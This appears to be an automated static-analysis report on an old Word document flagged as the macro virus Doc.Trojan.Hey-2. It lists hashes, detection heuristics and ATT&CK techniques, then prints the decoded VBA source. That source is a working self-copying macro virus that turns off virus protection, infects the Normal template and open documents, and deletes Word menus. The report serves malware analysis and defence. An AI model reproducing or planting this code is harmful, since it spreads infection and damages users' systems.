Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 419f7892a872388d…

MALICIOUS

Office (OLE)

29.5 KB Created: 2000-03-08 10:55:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: db2f98e7bcb4b621e2e1f096c2e781b0 SHA-1: a1f97227ca95818543a15555dc57cad0ca453943 SHA-256: 419f7892a872388dc297822d9cc0d7942213bebc78535513a051f17b80190109
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening. The script attempts to disable virus protection and manipulate command bars, indicating malicious intent. The presence of the 'pay' subroutine and the 'Hey this is the wild virus' comment strongly suggest a malicious payload delivery mechanism.

Heuristics 4

  • ClamAV: Doc.Trojan.Hey-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hey-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1676 bytes
SHA-256: 37e16f5b02e9d866d487d35a4c87a84efea6c5186a3887dc078e7f2f92f79817
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modulo1"
Sub AutoOpen(): Options.VirusProtection = 0:
Ááɦ£×
End Sub
Sub Ááɦ£×(): Set é = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set á = ActiveDocument.VBProject.VBComponents(1).CodeModule: Set í = ThisDocument.VBProject.VBComponents(1).CodeModule
If é.CountOfLines = 0 Then é.InsertLines 1, í.Lines(1, 26)
If á.CountOfLines = 0 Then á.InsertLines 1, í.Lines(1, 26)
End Sub
Sub AutoNew(): Ááɦ£×: MsgBox "Yeah": End Sub
Sub DateiNeu(): Dialogs(wdDialogFileNew).Show: Ááɦ£×: End Sub
Sub BearbeitenEinfügen(): Ááɦ£×: End Sub
Sub BearbeitenKopieren(): Ááɦ£×: End Sub
Sub BearbeitenAusschneiden(): Ááɦ£×: End Sub
Sub FormatZeichen(): Ááɦ£×: End Sub
Sub ExtrasOptionen(): Ááɦ£×: End Sub
Sub DateiÖffnen(): Dialogs(wdDialogFileOpen).Show: Ááɦ£×: End Sub
Sub DocumentOpen(): Dialogs(wdDialogFileOpen).Show: Ááɦ£×: End Sub
Sub DateiSchließen(): MsgBox "Yeah": End Sub
Sub DateiBeenden(): Ááɦ£×: End Sub
'Hey this is the wild virus
Sub pay():
CommandBars("Tools").Controls("Makro").Enabled = False
If Day(15) And Month(Now) Then CommandBars("Info").Delete
If Day(30) And Month(Now) Then CommandBars("Table").Delete
If Day(1) And Month(Now) Then CommandBars("Insert").Delete
If Day(10) And Month(6) Then CommandBars("View").Delete
End Sub